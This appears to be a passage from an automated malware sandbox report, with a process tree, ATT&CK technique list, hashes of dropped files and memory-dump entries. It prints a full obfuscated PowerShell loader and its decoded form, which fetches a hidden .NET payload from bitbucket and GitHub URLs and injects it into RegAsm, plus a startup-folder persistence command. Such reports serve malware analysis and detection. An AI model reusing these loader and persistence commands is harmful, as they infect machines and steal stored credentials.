        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1960
      - C:\Users\Admin\AppData\Local\Temp\MicrosoftServiceUpdater.exe
        
        C:\Users\Admin\AppData\Local\Temp\MicrosoftServiceUpdater.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:2656
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c one.vbs
        7⤵
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4364
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\one.vbs"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:5072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#C##d#B4#HQ#LgBt#H##YwBm#FM#bgBr#C8#cwBk#GE#bwBs#G4#dwBv#GQ#LwBm#Hc#Zg#v#Hc#ZgBz#GY#dwBm#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.mpcfSnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        10⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4928
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        11⤵
        
        PID:2856
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        11⤵
        Suspicious use of SetThreadContext
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:3148
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\lfyegwnjtygkenelx"
        12⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3472
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\vhlwgpydhgypgtaxospd"
        12⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:4972
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xbqhhhqevoqcrhobxdkwqnng"
        12⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1636
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vaolblwtsnszgiunhjwtproxfqsmxfsjel.vbs"
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:4232
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & echo URL="C:\Users\Admin\AppData\Local\DesignInno Innovations\InnoCraft.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:1820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\rmc\logs.dat

Filesize
102B

MD5
02d62ca8543d8a3624f9dd7296a813bc

SHA1
75fe118f00166b37a07bfa825d6ee68d3543f2cf

SHA256
f255e24ba88a4c7ff5e00dce2c5b2454bda122434e3d498121f50de7c07e6288

SHA512
a9a44fb9987f2b0bf4e9e0006a9efa17dd0f1d0cfee783357fd5c5f9ed2cd4fa56aa7b107e44a0e1eab2d5f6b4110c5f48a86aa15013af4e199bbdb9ab468b47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
fc3f093970de5d1b8f6c154bff30dc11

SHA1
2d84a0ffb141ea97a99d1ea939a476c6d40ea5d1

SHA256
c3648ab9cdcb530f2c792269b7212d9b33accab91297e94e709043d78d0a224c

SHA512
ff45a66d5555a375cf650fb686f3de335bb827f572a41138ae9ad7e406a84afebf8fd66e5810f5a40ea582d5d6d27711b9a9cb270ddfa8361224013d5d38f51e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\603423\Lucas.pif

Filesize
872KB

MD5
18ce19b57f43ce0a5af149c96aecc685

SHA1
1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

SHA256
d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

SHA512
a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

Download Submit
C:\Users\Admin\AppData\Local\Temp\603423\s

Filesize
713KB

MD5
a61cd75428195955c56a9eef603912ce

SHA1
8e8d3aa2e563765617254aa949f8b6c274bb0a83

SHA256
8c9e7ab10c40aaea832b0c5704108f9390c5982bd25a32c8602794613b4e9cd4

SHA512
227023389522767a8739e30e39bf702df11f724cf7f7c65f24ba8de3036fc627073d8e2b64ad250911e587eca3867a92a3619c96fa349b5781fd31da9974d0e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Clay

Filesize
94KB

MD5
08d48bb5a4e1c7a5a6ccec11c1a6cb68

SHA1
3d609ee87ca224a316227a8225b0f5ffe465aa98

SHA256
d1aae1434e502cea9556e394ce892df5407af5f1110222d6303032f792ed57fd

SHA512
19c7b4236b6e06b5d909b326ef73435d7e864f2c345adae1dd10f1af4f2b6a68d46c8339d9c0f17d00fc4a2947dcfccb1e8dbd1e9fbd29872ef65d61587c991f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Controllers

Filesize
5KB

MD5
630673fea68bda5ce7750d0bacb5ff0e

SHA1
ca24cfdd26fe66409230e5e1509f86d2bc3a0ba5

SHA256
be6a1c82eae77cf9bbaabefa38e652236a31317ccbf9f9f2387f4155b871a33d

SHA512
3a96dee0f6141f7d84aa3fd475a837c0dcf4d7afde871f87fde8c1199fb5514628b9d7efb05d3b720fd8e22166e44467e5863fdfa197193b7e3c04dd917084c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Disposition

Filesize
56KB

MD5
64be2aa6b09b4d3b1ae7f5496dc50d36

SHA1
d74a4209344293473d5ba7ec8f044419ca140b5d

SHA256
5773776eb34d9b7cf9efb47ff33655462607bcad9eafed7e3d27f192667b9944

SHA512
c9dae81739761f34ba9a1dcc16d484a76032b888954615884e70dff5fc9259dba7a89acfe0144cc60ae3bf3d20487e3c9a80cec19adc6575b4f9aaf92ee0b9a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Fighters

Filesize
62KB

MD5
c255a215a56f0191ff16163454ba6ed9

SHA1
2268b09fb0e58c569bc2cdf0562d7adb12471776

SHA256
e616974209f50ab58459f6fb5a960122cd37241b8c57a89556f443161c92b148

SHA512
5a009da0bddb7a49ef1cc6b270769c527de138c643eb454763e73efcdb9c40e918a70539956bfe0bfcfc248efdf4ff759080dc42b4b591f3a853ff0ff9ee8137

Download Submit
C:\Users\Admin\AppData\Local\Temp\Healthcare

Filesize
866KB

MD5
783575f3f822151ed1b1e1022a10e027

SHA1
d03e7b6be2eeb48e0e09b9050c4739b07a1a889d

SHA256
d1e3a4a8b96f3ea63281200340552d7a1e0a5514f3bb5726d10b0d871c20357e

SHA512
e19791dc189b3f699d02efbd8c1b05afbe6049ccf1d09a2a89d9fcc64ad15d10076389bac02ea110f76b959040f96e45b58b14568ae4874381e2515d1d9b595e

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\one.vbs

Filesize
15KB

MD5
3ab49c12b0bfcbb323bb5a1d340107ff

SHA1
c8f4f55296010f3122ac48ef5a173d74fa2c80d8

SHA256
333773edb783ec93040e6cf60f1873095f59606ae6dd376128bf44111551fe36

SHA512
09bb6cf4dad3ebb494c50c588c7b7e6516654e8ec498357c251d33ac183416376110f5e44b38f876d76d6122f593a393a85b2c693ac3289f8f8adea70e9d7c73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kits

Filesize
14KB

MD5
479ca8f2e48fcf67b018c911cd335ae1

SHA1
f8a2d5e86a8854bb97e1aa48e9dfe10fd24b32ef

SHA256
59194cc6347489f833b3d58ec07b1caa054fb48856c1d27299584ef34707a638

SHA512
9d5ce01be08edcde6904067b0e3c26f06d17f4501fa6dc68f8665c9b63faebd39acb6dc2eee82180532c71c63c4531db029bbdc78388eb0326263ffe964e496e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Mars

Filesize
62KB

MD5
7e3b9b5efedce4231bb02f1fd97fcd5d

SHA1
1042788b51134c23008ed274b598559e9b1568d8

SHA256
b7e8ee21f058df49534eac35fa6e4cdf1c3e6f599e0b131344f349284a0ce5b3

SHA512
3c621de45969a177209e9f6027cce646d165130c3d40a84f2920d3939efd30479e9e21912a8fc016f63ab84fdfa0879201faa421fa90031db6c81250bb524ff9

Download Submit
C:\Users\Admin\AppData\Local\Temp\MicrosoftServiceUpdater.exe

Filesize
180KB

MD5
1b8a04e03b265d0397c024b692e25c6e

SHA1
475eb0fd8f6582285b243e0773a61dc9ff8696da

SHA256
76efb280fc1d0ddf376aef018f26f3185fbd80990fb283ff02f522ead480b207

SHA512
521025cec9875929f3fb1dbf24f004d30b76cc0d21f07b9dc36d50624630044774471d6eb57886ea500254c9a51175fc668bdc3a0d17fec74c3521f61144b97c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Models

Filesize
83KB

MD5
a265646b71f2bd90b49af78bacb0a603

SHA1
c43be494ff7b8802e7e013c3d576767844a0102d

SHA256
ae7f2c347f8938bbf0532472bbc8984fe93e7c0748b1d368b1172dd1f2df60f2

SHA512
090d00aa588ad1cce583edbcc66b1b6de002d34fdca5743b6114ffcb84f4b645ee9947cdc494e83fedf4f704b13067b3fdc21f88f33e3085bcbe105d445577c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Paying

Filesize
94KB

MD5
440b16f0da2cabdfdb6de4c4f73a6061

SHA1
e983bc7837886155a9b45ff9c17cc5dad5daa02f

SHA256
992d790758c278dd0653c40bd77f70d8ee0378f277162637215ecae8815fe034

SHA512
4a49079828a9a6150de7b582be92dd7a43364a43b2fe04f1a782b5e32a36b3de9f4587b4091d82760bf566e318dc925d4684ec8a9e7993b8899b8ec042c6d917

Download Submit
C:\Users\Admin\AppData\Local\Temp\PdfReaderEn.EXE

Filesize
1.2MB

MD5
5699d5b44379624ebc78078a1b85e18c

SHA1
ec5c17b3d75b17ecac13189411c947a2e702d2bf

SHA256
06363ca6381d7c68f453b58f0566966caa9169c25dea626cfcb7001a3dd7bc5f

SHA512
db80b2bf2fba5ca707c34b3b96b37cc6f1b07d3ea932e8a1cf18dcbd0c14de264dc30b04aa079666aa1f6a37999d78a7b6bc6ba658486f241801e53e3dbe8ab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Semester

Filesize
14KB

MD5
a6d6c60fd822110be81938b5a83b9533

SHA1
5c6e5fb2f1ec160731f29757d7510a78190d1b21

SHA256
d11304a432fbd7ff5d1e44778d5bd348360ee46b00240049284f95276bdd47df

SHA512
e46a75de38b77af796e90426e89e8e5d697d7cad8f309f7067752c7b7341d81c0bb65ff1bbabe71026fafcdaedcd4ed29c0f5ceef086305f1b8c771bb6a189e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Southampton

Filesize
75KB

MD5
359570710d9793aa98e354bcbf386a38

SHA1
7b44dde782d9276654ef05e67a1dab5fa4310e85

SHA256
7146161b192a851540672d31b69b91f6d732cee8777ebbe6246798a4838d07e2

SHA512
8ec53f429a6ec12057a517cb32371e6e921a0fb10db2c462870c9bdff605b1247b07e2b29c199cb189f88c2baaaca7da0e427eb4ccf441b414fd0c64fd174c49

Download Submit
C:\Users\Admin\AppData\Local\Temp\Transition

Filesize
80KB

MD5
c42fcc17904fa666d76265b8a45b7734

SHA1
368acd51bd62beedb4cbddf7142473d5a873484d

SHA256
05fb815535624e6fdebd1d3fd3c41e5e056c368a7ca57e2d681b7e91aaa6a44e

SHA512
900c1f3fc85a96ff9384f8a15df264aec456a54841108e27f347797afd25031922db535a2749d1b627e28aea5206bfa7960bb1ca72820eb49b19e3543401b2db

Download Submit
C:\Users\Admin\AppData\Local\Temp\Usually

Filesize
93KB

MD5
1885adf09acfa4b8818bf8153786cbc3

SHA1
48b1c38c8712f683e722cbc1f7977a6b3f4e3b7d

SHA256
3ea7cee5a287a1f5a6923ccf717025658c0476968df6b6d5a1783a8b9f4dde74

SHA512
83d007312ccaac1e17d74feba18149f351e135f1c972bba62157e273863eecd566479c62d103048bba1eb6afebebe1eba4c018ffb7f2dd7da12dbb9455215e42

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3msztt1j.mcr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\lfyegwnjtygkenelx

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\vaolblwtsnszgiunhjwtproxfqsmxfsjel.vbs

Filesize
544B

MD5
4196262905f64f1dd00381f882d1e2c4

SHA1
325434edd2f6930f987de42e51228ca348745413

SHA256
0b3cbde8778e4f47322ca017b5280f6eed3cd6f327b436eea4e91fbeb364a092

SHA512
c3367ac15a473485aceafbe52aa591e33fb67dff21896b936173db78d2889f9ee200ce4b7d78ede67bc471433444dea1c4cb36013cda7f6f9f7df3416bb1aa73

Download Submit
memory/748-181-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-169-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-166-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-167-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-168-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-170-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-171-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-172-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-180-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-179-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-177-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-178-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-174-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/748-173-0x00000000041E0000-0x0000000004262000-memory.dmp

Filesize
520KB

Download
memory/1636-137-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1636-141-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1636-142-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1900-1-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

Filesize
10.8MB

Download
memory/1900-27-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

Filesize
10.8MB

Download
memory/1900-33-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

Filesize
10.8MB

Download
memory/1900-2-0x00000224FAAA0000-0x00000224FAAC2000-memory.dmp

Filesize
136KB

Download
memory/1900-8-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

Filesize
10.8MB

Download
memory/1900-0-0x00007FFB0A763000-0x00007FFB0A765000-memory.dmp

Filesize
8KB

Download
memory/1900-23-0x00007FFB0A763000-0x00007FFB0A765000-memory.dmp

Filesize
8KB

Download
memory/1900-12-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

Filesize
10.8MB

Download
memory/3088-24-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/3088-29-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/3148-119-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3148-127-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3148-105-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3148-106-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
